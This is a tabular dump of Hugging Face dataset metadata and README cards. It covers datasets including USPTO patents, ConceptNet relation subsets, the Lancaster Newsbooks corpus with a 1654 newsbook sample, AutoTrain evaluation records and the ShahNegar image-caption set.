author
stringlengths
2
29
cardData
null
citation
stringlengths
0
9.58k
description
stringlengths
0
5.93k
disabled
bool
1 class
downloads
float64
1
1M
gated
bool
2 classes
id
stringlengths
2
108
lastModified
stringlengths
24
24
paperswithcode_id
stringlengths
2
45
private
bool
2 classes
sha
stringlengths
40
40
siblings
list
tags
list
readme_url
stringlengths
57
163
readme
stringlengths
0
977k
ufukhaman
null
null
null
false
1
false
ufukhaman/uspto_balanced_filtered_20k_ipc_patents
2022-07-19T18:41:55.000Z
null
false
963b836b3d7fd47cbd26d81f1fee35cd21ec1ddb
[]
[ "annotations_creators:USPTO", "language:English", "license:mit", "multilinguality:monolingual", "size_categories:10K<n<100K", "source_datasets:original", "tags:patent", "tags:refined_patents", "tags:patent classification", "tags:uspto", "tags:ipc", "task_categories:text-classification", "tas...
https://huggingface.co/datasets/ufukhaman/uspto_balanced_filtered_20k_ipc_patents/resolve/main/README.md
--- annotations_creators: - USPTO language: - English license: - mit multilinguality: - monolingual pretty_name: uspto_balanced_filtered_200k_ipc_patents size_categories: - 10K<n<100K source_datasets: - original tags: - patent - refined_patents - patent classification - uspto - ipc task_categories: - text-classification task_ids: - topic-classification ---
relbert
null
@inproceedings{li-16, title = {Commonsense Knowledge Base Completion}, author = {Xiang Li and Aynaz Taheri and Lifu Tu and Kevin Gimpel}, booktitle = {Proc. of ACL}, year = {2016} } @InProceedings{P16-1137, author = "Li, Xiang and Taheri, Aynaz and Tu, Lifu and Gimpel, Kevin", title = "Commonsense Knowledge Base Completion", booktitle = "Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers) ", year = "2016", publisher = "Association for Computational Linguistics", pages = "1445--1455", location = "Berlin, Germany", doi = "10.18653/v1/P16-1137", url = "http://aclweb.org/anthology/P16-1137" }
[ConceptNet with high confidence](https://home.ttic.edu/~kgimpel/commonsense.html)
false
1
false
relbert/conceptnet_high_confidence
2022-09-20T01:13:24.000Z
null
false
7a73e5c5d9569f29a92fc65be56c3908ec280419
[]
[ "language:en", "license:other", "multilinguality:monolingual", "size_categories:1K<n<10K" ]
https://huggingface.co/datasets/relbert/conceptnet_high_confidence/resolve/main/README.md
--- language: - en license: - other multilinguality: - monolingual size_categories: - 1K<n<10K pretty_name: ConceptNet with High Confidence --- # Dataset Card for "relbert/conceptnet_high_confidence" ## Dataset Description - **Repository:** [RelBERT](https://github.com/asahi417/relbert) - **Paper:** [https://home.ttic.edu/~kgimpel/commonsense.html](https://home.ttic.edu/~kgimpel/commonsense.html) - **Dataset:** High Confidence Subset of ConceptNet ### Dataset Summary The selected subset of ConceptNet used in [this work](https://home.ttic.edu/~kgimpel/commonsense.html), which compiled to fine-tune [RelBERT](https://github.com/asahi417/relbert) model. ## Dataset Structure ### Data Instances An example of `train` looks as follows. ``` { "relation_type": "AtLocation", "positives": [["fish", "water"], ["cloud", "sky"], ["child", "school"], ... ], "negatives": [["pen", "write"], ["sex", "fun"], ["soccer", "sport"], ["fish", "school"], ... ] } ``` ### Data Splits | name |train|validation| |---------|----:|---------:| |conceptnet_high_confidence| 25 | 24| ### Number of Positive/Negative Word-pairs in each Split | relation_type | positive (train) | negative (train) | positive (validation) | negative (validation) | |:-----------------|-------------------:|-------------------:|------------------------:|------------------------:| | AtLocation | 383 | 1768 | 97 | 578 | | CapableOf | 195 | 1790 | 73 | 600 | | Causes | 71 | 1797 | 26 | 595 | | CausesDesire | 9 | 1793 | 11 | 595 | | CreatedBy | 2 | 1796 | 0 | 0 | | DefinedAs | 0 | 0 | 2 | 595 | | Desires | 16 | 1794 | 12 | 595 | | HasA | 67 | 1814 | 17 | 595 | | HasFirstSubevent | 2 | 1796 | 0 | 0 | | HasLastSubevent | 2 | 1796 | 3 | 593 | | HasPrerequisite | 168 | 1803 | 57 | 592 | | HasProperty | 94 | 1801 | 39 | 605 | | HasSubevent | 125 | 1798 | 40 | 609 | | IsA | 310 | 1764 | 98 | 603 | | MadeOf | 17 | 1793 | 7 | 593 | | MotivatedByGoal | 14 | 1796 | 11 | 595 | | NotCapableOf | 15 | 1793 | 0 | 0 | | NotDesires | 4 | 1795 | 4 
| 592 | | PartOf | 34 | 1801 | 7 | 593 | | ReceivesAction | 18 | 1793 | 8 | 593 | | SymbolOf | 0 | 0 | 2 | 596 | | UsedFor | 249 | 1815 | 81 | 588 | | SUM | 1795 | 35896 | 595 | 11305 | ### Citation Information ``` @InProceedings{P16-1137, author = "Li, Xiang and Taheri, Aynaz and Tu, Lifu and Gimpel, Kevin", title = "Commonsense Knowledge Base Completion", booktitle = "Proceedings of the 54th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers) ", year = "2016", publisher = "Association for Computational Linguistics", pages = "1445--1455", location = "Berlin, Germany", doi = "10.18653/v1/P16-1137", url = "http://aclweb.org/anthology/P16-1137" } ```
relbert
null
@inproceedings{speer2017conceptnet, title={Conceptnet 5.5: An open multilingual graph of general knowledge}, author={Speer, Robyn and Chin, Joshua and Havasi, Catherine}, booktitle={Thirty-first AAAI conference on artificial intelligence}, year={2017} }
[ConceptNet5](https://ojs.aaai.org/index.php/AAAI/article/view/11164)
false
2
false
relbert/conceptnet
2022-07-26T10:24:35.000Z
null
false
41b8a9a3b3f7aab40340b983c8fd852240cf5fc5
[]
[ "language:en", "license:other", "multilinguality:monolingual", "size_categories:1K<n<10K" ]
https://huggingface.co/datasets/relbert/conceptnet/resolve/main/README.md
--- language: - en license: - other multilinguality: - monolingual size_categories: - 1K<n<10K pretty_name: ConceptNet --- # Dataset Card for "relbert/conceptnet" ## Dataset Description - **Repository:** [RelBERT](https://github.com/asahi417/relbert) - **Paper:** [https://ojs.aaai.org/index.php/AAAI/article/view/11164](https://ojs.aaai.org/index.php/AAAI/article/view/11164) - **Dataset:** ConceptNet5 ### Dataset Summary ConceptNet5, which compiled to fine-tune [RelBERT](https://github.com/asahi417/relbert) model. ## Dataset Structure ### Data Instances An example of `train` looks as follows. ``` { "relation_type": "AtLocation", "positives": [["fish", "water"], ["cloud", "sky"], ["child", "school"], ... ], "negatives": [["pen", "write"], ["sex", "fun"], ["soccer", "sport"], ["fish", "school"], ... ] } ``` ### Data Splits | name |train|validation| |---------|----:|---------:| |conceptnet| 33 | 25| ### Number of Positive/Negative Word-pairs in each Split | relation_type | positive (train) | negative (train) | positive (validation) | negative (validation) | |:-----------------|-------------------:|-------------------:|------------------------:|------------------------:| | Antonym | 3175 | 206870 | 703 | 65330 | | AtLocation | 6974 | 203071 | 727 | 65306 | | CapableOf | 603 | 209442 | 0 | 0 | | Causes | 906 | 209139 | 83 | 65950 | | CausesDesire | 195 | 209850 | 30 | 66003 | | CreatedBy | 104 | 209941 | 4 | 66029 | | DefinedAs | 16 | 210029 | 2 | 66031 | | Desires | 374 | 209671 | 0 | 0 | | DistinctFrom | 1552 | 208493 | 426 | 65607 | | Entails | 277 | 209768 | 118 | 65915 | | HasA | 606 | 209439 | 10 | 66023 | | HasContext | 4664 | 205381 | 1936 | 64097 | | HasFirstSubevent | 66 | 209979 | 17 | 66016 | | HasLastSubevent | 82 | 209963 | 14 | 66019 | | HasPrerequisite | 586 | 209459 | 123 | 65910 | | HasProperty | 1397 | 208648 | 0 | 0 | | HasSubevent | 644 | 209401 | 64 | 65969 | | InstanceOf | 1 | 210044 | 0 | 0 | | IsA | 54028 | 156017 | 21122 | 44911 | | LocatedNear 
| 21 | 210024 | 3 | 66030 | | MadeOf | 221 | 209824 | 23 | 66010 | | MannerOf | 8762 | 201283 | 3747 | 62286 | | MotivatedByGoal | 282 | 209763 | 35 | 65998 | | NotCapableOf | 17 | 210028 | 0 | 0 | | NotDesires | 235 | 209810 | 0 | 0 | | NotHasProperty | 74 | 209971 | 19 | 66014 | | PartOf | 6880 | 203165 | 2629 | 63404 | | ReceivesAction | 290 | 209755 | 0 | 0 | | RelatedTo | 61672 | 148373 | 11356 | 54677 | | SimilarTo | 82 | 209963 | 36 | 65997 | | SymbolOf | 1 | 210044 | 0 | 0 | | Synonym | 52261 | 157784 | 22391 | 43642 | | UsedFor | 2997 | 207048 | 415 | 65618 | | SUM | 210045 | 6.72144e+06 | 66033 | 1.58479e+06 | ### Citation Information ``` @inproceedings{speer2017conceptnet, title={Conceptnet 5.5: An open multilingual graph of general knowledge}, author={Speer, Robyn and Chin, Joshua and Havasi, Catherine}, booktitle={Thirty-first AAAI conference on artificial intelligence}, year={2017} } ```
biglam
null
@misc{20.500.12024/2531, title = {The Lancaster Newsbooks Corpus}, author = {Thomason, George, d. 1666}, url = {http://hdl.handle.net/20.500.12024/2531}, note = {Oxford Text Archive}, copyright = {Distributed by the University of Oxford under a Creative Commons Attribution-{NonCommercial}-{ShareAlike} 3.0 Unported License.}, year = {2005} }
This corpus consists of two collections of seventeenth-century English "newsbooks". Both were drawn from the Thomason Tracts collection, which is held at the British Library and available in graphical form via Early English Books Online (EEBO). The construction of these keyboarded versions were in both cases funded by the British Academy. The FIRST collection (1654_newsbooks) consists of every newsbook published in London and still surviving in the Thomason Tracts from the first half of 1654 (to be precise, for the second half of December 1653 to the end of May 1654, with one or two additions from the first week in June, 1654). This was constructed for the project "Looking at text re-use in a corpus of seventeenth-century news reportage", funded by the British Academy, grant reference SG-33825. The SECOND collection (mercurius_fumigosus) consists of every surviving issue published of the highly idiosyncratic newsbook "Mercurius Fumigosus", written by John Crouch between summer 1654 and early autumn 1655. This was constructed for the project "Decoding the news - Mercurius Fumigosus as a source of news in the interregnum, 1654-1655", funded by the British Academy, grant reference LRG-35423. This is version 1.0 of the corpus, released April 2007; it supercedes earlier versions circulated informally. For more information about the corpus, see www.ling.lancs.ac.uk/newsbooks
false
1
false
biglam/lancaster_newsbooks
2022-08-18T16:03:54.000Z
null
false
c5cd49c2881afa3525bbf9298f503934f3805f5c
[]
[ "annotations_creators:no-annotation", "language:en", "language_creators:expert-generated", "license:cc-by-sa-3.0", "multilinguality:monolingual", "size_categories:n<1K", "source_datasets:original", "tags:newsbooks", "tags:1654", "tags:lancaster", "tags:oxford text" ]
https://huggingface.co/datasets/biglam/lancaster_newsbooks/resolve/main/README.md
--- annotations_creators: - no-annotation paperswithcode_id: null language: - en language_creators: - expert-generated license: - cc-by-sa-3.0 multilinguality: - monolingual pretty_name: Lancaster Newsbooks size_categories: - n<1K source_datasets: - original tags: - newsbooks - '1654' - lancaster - oxford text task_categories: [] task_ids: [] --- # Dataset Card for lancaster_newsbooks ## Table of Contents - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-instances) - [Data Splits](#data-instances) - [Dataset Creation](#dataset-creation) - [Curation Rationale](#curation-rationale) - [Source Data](#source-data) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) ## Dataset Description - **Homepage:** https://ota.bodleian.ox.ac.uk/repository/xmlui/handle/20.500.12024/2531 - **Repository:** [Needs More Information] - **Paper:** [Needs More Information] - **Leaderboard:** [Needs More Information] - **Point of Contact:** Tony McEnery ### Dataset Summary This corpus consists of two collections of seventeenth-century English "newsbooks". Both were drawn from the Thomason Tracts collection, which is held at the British Library and available in graphical form via Early English Books Online (EEBO). The construction of these keyboarded versions were in both cases funded by the British Academy. 
The FIRST collection (1654_newsbooks) consists of every newsbook published in London and still surviving in the Thomason Tracts from the first half of 1654 (to be precise, for the second half of December 1653 to the end of May 1654, with one or two additions from the first week in June, 1654). This was constructed for the project "Looking at text re-use in a corpus of seventeenth-century news reportage", funded by the British Academy, grant reference SG-33825. The SECOND collection (mercurius_fumigosus) consists of every surviving issue published of the highly idiosyncratic newsbook "Mercurius Fumigosus", written by John Crouch between summer 1654 and early autumn 1655. This was constructed for the project "Decoding the news - Mercurius Fumigosus as a source of news in the interregnum, 1654-1655", funded by the British Academy, grant reference LRG-35423. This is version 1.0 of the corpus, released April 2007; it supercedes earlier versions circulated informally. For more information about the corpus, see www.ling.lancs.ac.uk/newsbooks ### Supported Tasks and Leaderboards `text-classification`: This dataset can be used to augent existing datasets to find stylistic differences between texts from different time periods ### Languages The language in this dataset is English from 1654. The associated BCP-47 code is `en:GB` ## Dataset Structure ### Data Instances ``` { 'id': 'PerfAcc170', 'text': "Another late fight in Scotland, betwixt Col. Morgan and the Highlanders; with the number that were slain and taken Prisoners. The removing of Lieut. Col. John Lilburn from the Tower of London. The readiness of our Fleet for new action, though Peace be agreed on with Holland and Denmark. The taking of several more Prizes at sea. An Order of the Commissioners for the Trial and Approbation of public Preachers. Several proceedings of His Highness the Lord Protector and his Council, and another Ordinance touching the adjourning of the Term. 
Together with variety of choice Intelligence from several Foreign parts. From Wednesday APRIL 5 TO Wednesday April 12. 1654. Many Addresses were made to his Highness the Lord Protector, in the name of the City and County of York, and other places, wherein they acknowledge the great blessing of God to this Nation, that they have so great, so good and able a Protector. This day the Sessions began in the Old Bailey, and one of those that committed the late Robbery on Black-Heath, being called to his Trial, he refused to plead; but more hereafter. This evening about 9 of the Clock, the Dutch Ambassadors signed and sealed the Ratification of the Articles of Peace so long spoken of; so did likewise the Commissioners appointed to treat with them by his Highness the Lord Protector. Paris April 11, 1654. The Cardinal de Retz being removed from Vincennes by the Marshal de la Mesteray, is now safe arrived at Nantes, and put into the Castle. The Court Emissaries give out that he is not to be long there, but in a few days to be set at liberty, only that his Majesty desireth satisfaction upon some certain points, although the main drift is to make him surrender his place of Archbishop of this City. 
The Commissioners of Languedoc cannot yet prevail in anything upon their Complaints, but are like the Commissioners of Catalonia, who hitherto have prevailed no further than to receive many fair words, but nothing effectual, the main work now in hand, is to find monies speedily for the setting forth of the Army, that they may be in the field as soon as may be, and to that end the Partisans are not wanting to find out new ways for exacting of monies, preferring large sums to be put into the King's Coffers, the difficulty lieth only in the effecting of it, by reason that the Country is in most places so exhausted of monies, that they are scarce able to live: The design for the King's Coronation is now on foot again, and if I am rightly informed, it will be done about the middle of May next, which being done, his Majesty shall go upon the borders and down to Picardy to forward his Army in their Action, so much the rather, by reason that the Prince of Conde, whom we hear was last week at Valenciennes, and then taking a view of his Army, is returned to Bruxels, there to confer with the Archduke Leopoldus for to obtain money and other necessaries for the march of his Army, that so they may fall to action as soon as the weather and season will give them leave, his Lady and son are still at Rocroy, where they are expecting some alteration to their present condition. The Earl of Harcourt hath not yet received any answer from the Court upon those proposals which he lately sent to the Court. We have news, that the Duke Francis hath at last accepted the command of his Brother the Duke of Lorrain's Army, and is expected there in a few days, which our Cardinal doth very well relish. The forces that were in the Country of Liege are now marching homewards, and are to be quartered in Lorrain. 
The great preparation for an Armado to go from Marseilles and Touloon, is much at a stand, only there are lately 5 men of War gone to Sea, and 3 more are to follow, but upon no design than to rob and plunder upon the sea, sparing scarce any they encounter, whether they be friends or foes. This day his Highness the Lord Protector and his Council, passed an Ordinance for adjourning of Easter Term, from and after the first Return thereof, called Quindena Pasch, until the first Return of Trinity Term, called Crastino Trinatatis. Dalkieth, April 3. Cap. Sherwin Commander of the Primrose, and Cap. Smith Commander of the Duchess, in their return from Orkney, took a Dutch vessel laden with French and Spanish Wines, linen Cloth, and other good commodities, bound for the West Indies; they sent her into Aberdeen. Some young Lairds and others purposing to glean a party of horse in Lothian, and repair to the enemy, are taken, and brought hither prisoners. Aberdeen, April 1. The Earl of Athol is come to Glencarn with about 700 horse and foot, Seaford and some new raised forces are daily expected to join with them. Glencarn with his whole force, consisting of 2000 horse and foot, is at Dingwel, two miles from Brahan, not undeserving the name of an Island, so that we hope to engage them there. In order whereunto Lieut. Col. Mitchell is marched towards Inverness with 9 companies of Foot, and Col. Morgan hath followed him with 5 troops of Col Rich his Regiment, and 4 troops of Dragoons; he intends to take Col. Tomlinson's Regiment, which is in his way, and to draw 5 companies of Foot out of Inverness. From Cows in the Isle of Wight, April 6. A private man of War hath, about two days since, taken and brought in hither two French vessels, one of which is laden with Salt, the other hath but little except ballast; Our Fleet is for the most part near St. Helens point and the rest as the Spits head, being in all near 100 sail, gallant ships, and bravely accommodated. 
One of our Frigates hath taken a Holland ship, and carried her to Portsmouth; she hath in her 8 Bales of Paper, and some small quantity of Indico. Many ships that were here, went away yesterday morning towards the Downs; and several Merchants' ships are at present here in this road, being detained by contrary winds; they expect some favourable Easterly gales, that so they may proceed on their intended voyages. Deal, April 7. A man of War of ours is this morning gone for Holland, to get the Ratification of the Peace made with them, and an Express from the Dutch Ambassador, touching the Agreement. Most part of the ships which remained in this Road, are gone up into the River of Thames; here is only some few left that are bound to the Southward. A Fleet consisting of about 40 or 50 sail of ships, great and small, passed by this place, which we suppose to be the Dunkirk fleet bound for London. Because many will not give credit to the Agreement of Peace between the Commonwealths of England and Holland, (though their Unbelief proceeds from several causes, some prejudicately fearing the worst, and others wishing and desiring rather than the Fountain of Blood may still be open) We can, and do assure you, That the Articles (as we said before) were signed and sealed by the Commissioners on both sides, on Wednesday night last, and within 14 days are to be signed and sealed by the Lord Protector, and the States of Holland, and then to publicly proclaimed and published, both in England and Holland in one day. The Agreement with Denmark is also taken in upon the Articles: And for satisfaction of the loss which our English Merchants sustained by that King's command, whose demands amount to about 150000l. it is referred to four Merchants, two whereof to be English, and the other two Dutch; which four Merchants shall have absolute power to determine those demands within the space of twenty days; the place where they are to sit, is Guildhall. 
As touching the business of Amboyna, it is referred to eight Commissioners, who have six months time to agree thereon, and in case they agree not, then Umpires are nominated to determine that business. Let those that delight themselves in blood, have blood to drink, for they are worthy. From Legorn, March 23. thus. This week in the sight of this City was a sore fight between two ships at Sea, the one Dutchman of War of 32 guns, and the other an English ship called the Expedition, who came from Zant with Currans; the fight lasted 6 hours, but night having parted them, both ships sunk; most of the men were saved, but nothing else, though the fight was near the shore. It is advertised from Cullen, That the Treaty between that Elector and the Spanish Commissioners, is brought to perfection, and signed, which is, That both French and Spanish shall have free passage through the Country of Liege, not committing any acts of hostility upon each other; and the Spaniards in point of satisfaction for the losses received from them and the Lorrainers, shall pay to the said Elector 200000 Rixdollars out of the Duke of Lorrain's estate, and for security of performance, the Lordship of Kerpen, and another in Gulick shall be put into his hands until full payment. From Poland thus. The General of the Cossacks hath delivered up three very considerable places to the Muscovite, and caused himself to be re baptized after the Muscovia manner, which is so ill resented by all sorts of people in that Country, that the Commanders sent to the King of Poland, That if he pleased to send them a general pardon for what they had done, and the rest of the Army, they will return with the major part of the Army into his Majesty's service; which hath so incensed the General, that having caused them to be apprehended he hath made each of them shorter by the head, which hath caused much heart burning among the people. 
Whereas many abuses and corruptions are crept into the ordinary course and administration of Justice, both in Law and Equity, the reformation whereof hath not yet been attained; Out of a tender care and desire that so necessary and good a work may at length be brought to effect, it is held convenient that so necessary and good a work may at length be brought to effect, it is held convenient that so necessary and good a work may at length be brought to effect, it is held convenient and necessary to adjourn part of the next Term of Easter; be if therefore Ordained by his Highness the Lord Protector, by and with the consent of his Council, That part of the said Term of Easter now next coming be adjourned, that is to say, from and after the first Return, called Quindena Pasch, unto the last Return of the said Easter Term, called Crastino Ascensionis; And all and every person or persons, which have cause, or commandment to appear in any of the Courts at Westminster, in or at any day or time, from and after the said Return, called Quindena Pasch, may tarry at their dwellings, or where their business shall lie, without resorting to any of the said Courts for that Cause, until the said last Return, called Crastino Ascensionis, without danger or forfeiture, penalty or contempt to be in that behalf. And be it also ordained by the Authority aforesaid, That Writs of Adjournment shall be directed to the Justices of the said Courts, and Barons of the Exchequer, giving them authority to adjourn the said part of the said Term of Easter, as aforesaid, that is to say, from and after the said first Return called Quindena Pasch, until the said last Return of the said Term, called Crastino Ascensionis, as before is said, and the said adjournment shall be made, as aforesaid. 
And be it further Ordained, That all Matters, Causes and Suits, depending in any of the said Courts, shall have continuance, and the parties shall have day, from the day of the said Adjournment, until the said Return of Crastino Ascensionis, as is aforesaid; and the Lord's Commissioners of the Great Seal are required to issue forth Writs accordingly. And be it further Ordained, That a former Ordinance of the sixth day of this instant April, for the Adjourning of part of the said Term, until the first Return of Trinity Term next, called Crastino Trinitatis, be from henceforth Repealed and void. And it is lastly Ordained by the Authority aforesaid, That the Sheriffs of London and Middlesex, and all other Sheriffs both in England and Wales, do forthwith proclaim and publish this Ordinance in the chief Market Towns and usual places within their several and respective Counties. Lieutenant Colonel John Lilburn being said to have again attempted something against the State, is removed from the Tower to be prisoner in some more remote place. The titular King of Scots is still at Paris, and of late something more merry than ordinary. The Deputies for Languedoc telling him, that if there were a Peace concluded with England, it would be well for all the Protestants in France; He made answer that he was glad of it, for it would then be the better for himself. This day was the Gaol delivery; three were hanged, one whereof died most desperately, and going up the Cart, drank a health to the Devil's Majesty: One was pressed last Saturday, and being afterwards heard to groan, was carried down to the Press-yard again to have the execution dispatched. 
The Commissioners for Approbation of public Ministers, sate at Whitehall, and divers Certificates were presented unto them in behalf of several particular persons, for approbation; and in regard that none hereafter should out of carelessness of partiality set their hands to a Certificate for any person that hereafter should out of carelessness or partiality let their hands to a Certificate for any person that hereafter may be found unworthy to be admitted, and so become prejudicial to the Church of Christ, and frustrate the intentions of our Governors which made this Ordinance; the said Commissioners do earnestly beseech all whom it may concern (in the bowels of Christ) as they tender the honour of the great God himself, whose servants we all are, the prejudice of the souls of his people purchased by the blood of his Son, the advancement and propagation of his Gospel, through all the parts of this Land and Nation, whereunto we belong, so to lend assistance both of their fervent prayers, and due informations, that thereby the work may be carried on more prosperously, and the Commissioners more encouraged to attend it. Signed in the name, and at the request of the Commissioners for Approbation of public Preachers. By Francis Rouse, Io. Arrowsmith. William Goss. Stephen Marshall. The last Letters from Edinburgh speak of another Engagement betwixt Col. Morgan, and the Enemy; but they tell us not the particulars, only they say, that the Enemy is once more dispersed, and driven further up into the mountains, with the loss of about 200 men. The peace with Holland being concluded (as you heard before) our Merchants are lading of goods on shipboard, as fast as Lighters can be gotten to carry them where the ships ride at anchor. We likewise hear of the like preparations in Holland for transporting of goods of several sorts hither. 
And now all the rest of Europe are at a stand, or at leastwise stand gazing upon us, and begin to cast about with themselves, what action may be great and considerable enough for to be undertaken next by those great Fleets, which are as ready for action as any opportunity can be to offer itself. How they will be disposed of Time will discover. London, Printed by E. Alsop 1654.", 'title': 'A Perfect Account, Issue 170'} ``` ### Data Fields ``` { "id": Unique identifier for that data point("string"), "text": Text in that datapoint("string"), "title": The title of the news article("string") } ``` ### Data Splits Train: 303 ## Dataset Creation ### Curation Rationale The FIRST collection (1654_newsbooks) consists of every newsbook published in London and still surviving in the Thomason Tracts from the first half of 1654 (to be precise, for the second half of December 1653 to the end of May 1654, with one or two additions from the first week in June, 1654) and was constructed for the project "Looking at text re-use in a corpus of seventeenth-century news reportage", funded by the British Academy, grant reference SG-33825. The SECOND collection (mercurius_fumigosus) consists of every surviving issue published of the highly idiosyncratic newsbook "Mercurius Fumigosus", written by John Crouch between summer 1654 and early autumn 1655. This was constructed for the project "Decoding the news - Mercurius Fumigosus as a source of news in the interregnum, 1654-1655", funded by the British Academy, grant reference LRG-35423. ### Source Data #### Initial Data Collection and Normalization This corpus was created by the Department of Linguistics and English Language, Lancaster University. #### Who are the source language producers? The original data was humna-generated from existing newsbooks ### Annotations #### Annotation process [N/A] #### Who are the annotators? 
[N/A] ### Personal and Sensitive Information None, since this dataset is from 1654 ## Considerations for Using the Data ### Social Impact of Dataset This dataset provides an insight into the news and social systems from 17th century England ### Discussion of Biases The dataset is from the 17th century and some articles might reflect social biases of the time in terms of sexuality, gender, race, etc. ### Other Known Limitations [N/A] ## Additional Information ### Dataset Curators This corpus was created by the Department of Linguistics and English Language, Lancaster University. Project leader: Tony McEnery Corpus editor: Andrew Hardie ### Licensing Information Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License ### Citation Information @misc{20.500.12024/2531, title = {The Lancaster Newsbooks Corpus}, author = {Thomason, George, d. 1666}, url = {http://hdl.handle.net/20.500.12024/2531}, note = {Oxford Text Archive}, copyright = {Distributed by the University of Oxford under a Creative Commons Attribution-{NonCommercial}-{ShareAlike} 3.0 Unported License.}, year = {2005} }
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-samsum-7328461a-11225503
2022-07-19T22:01:15.000Z
null
false
6c18754cc3af5656edef386b34f37ef496788a33
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:samsum" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-samsum-7328461a-11225503/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - samsum eval_info: task: summarization model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 metrics: ['perplexity'] dataset_name: samsum dataset_config: samsum dataset_split: test col_mapping: text: dialogue target: summary --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 * Dataset: samsum * Config: samsum * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model.
autoevaluate
null
null
null
false
1
false
autoevaluate/autoeval-staging-eval-project-cnn_dailymail-73f27c66-11235504
2022-07-21T05:32:04.000Z
null
false
97d2dd14602e380348a4f29f4441e70a01858e1f
[]
[ "type:predictions", "tags:autotrain", "tags:evaluation", "datasets:cnn_dailymail" ]
https://huggingface.co/datasets/autoevaluate/autoeval-staging-eval-project-cnn_dailymail-73f27c66-11235504/resolve/main/README.md
--- type: predictions tags: - autotrain - evaluation datasets: - cnn_dailymail eval_info: task: summarization model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 metrics: ['perplexity'] dataset_name: cnn_dailymail dataset_config: 3.0.0 dataset_split: test col_mapping: text: article target: highlights --- # Dataset Card for AutoTrain Evaluator This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset: * Task: Summarization * Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11 * Dataset: cnn_dailymail * Config: 3.0.0 * Split: test To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator). ## Contributions Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model.
naver-clova-ix
null
null
null
false
2,415
false
naver-clova-ix/cord-v2
2022-07-19T23:43:33.000Z
null
false
7f0115a4b758a71d6473b8d085751692da2fef98
[]
[ "license:cc-by-4.0" ]
https://huggingface.co/datasets/naver-clova-ix/cord-v2/resolve/main/README.md
--- license: cc-by-4.0 ---
miyoung
null
null
null
false
1
false
miyoung/datasetTest
2022-07-20T01:42:35.000Z
null
false
672de36dac4dff8857b5b4f07443f721d0cada1a
[]
[ "license:afl-3.0" ]
https://huggingface.co/datasets/miyoung/datasetTest/resolve/main/README.md
--- license: afl-3.0 ---
Willaim
null
null
null
false
2
false
Willaim/H
2022-07-20T02:50:07.000Z
null
false
961402a28a0c436af83eab460132148053441208
[]
[]
https://huggingface.co/datasets/Willaim/H/resolve/main/README.md
from transformers import AutoTokenizer, AutoModel tokenizer = AutoTokenizer.from_pretrained("bigscience/bloom") model = AutoModel.from_pretrained("bigscience/bloom")
sadrasabouri
null
null
null
false
8
false
sadrasabouri/ShahNegar
2022-10-21T11:54:05.000Z
null
false
8acfecc725b172d1283aa50f67521ddc08b3c682
[]
[ "annotations_creators:machine-generated", "language_creators:expert-generated", "language:en", "license:mit", "multilinguality:monolingual", "size_categories:10K<n<100K", "source_datasets:original", "task_categories:image-to-text", "task_categories:text-to-image", "task_ids:image-captioning" ]
https://huggingface.co/datasets/sadrasabouri/ShahNegar/resolve/main/README.md
--- annotations_creators: - machine-generated language_creators: - expert-generated language: - en license: - mit multilinguality: - monolingual size_categories: - 10K<n<100K source_datasets: - original task_categories: - image-to-text - text-to-image task_ids: - image-captioning pretty_name: ShahNegar --- # ShahNegar (A Plotted version of The Shahnameh) This dataset is a plotted version of Ferdowsi's Shahnameh (which is a highly-regarded ancient set of Farsi poems) generated using DALL-E mini (aka [craiyon](https://www.craiyon.com/)). You can use this dataset using the code below: ```python from datasets import load_dataset dataset = load_dataset("sadrasabouri/ShahNegar") ``` ## Table of Contents - [Table of Contents](#table-of-contents) - [Dataset Description](#dataset-description) - [Dataset Summary](#dataset-summary) - [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards) - [Languages](#languages) - [Dataset Structure](#dataset-structure) - [Data Instances](#data-instances) - [Data Fields](#data-fields) - [Data Splits](#data-splits) - [Dataset Creation](#dataset-creation) - [Annotations](#annotations) - [Personal and Sensitive Information](#personal-and-sensitive-information) - [Considerations for Using the Data](#considerations-for-using-the-data) - [Social Impact of Dataset](#social-impact-of-dataset) - [Discussion of Biases](#discussion-of-biases) - [Other Known Limitations](#other-known-limitations) - [Additional Information](#additional-information) - [Dataset Curators](#dataset-curators) - [Licensing Information](#licensing-information) - [Citation Information](#citation-information) - [Contributions](#contributions) ## Dataset Description - **Paper:** - **Point of Contact:** [Sadra Sabouri](mailto:sabouri.sadra@gmail.com) ### Dataset Summary This dataset contains more than 30K images with their corresponding text from the Shahnameh. For each Shahnameh paragraph, we generated at most 9 images. 
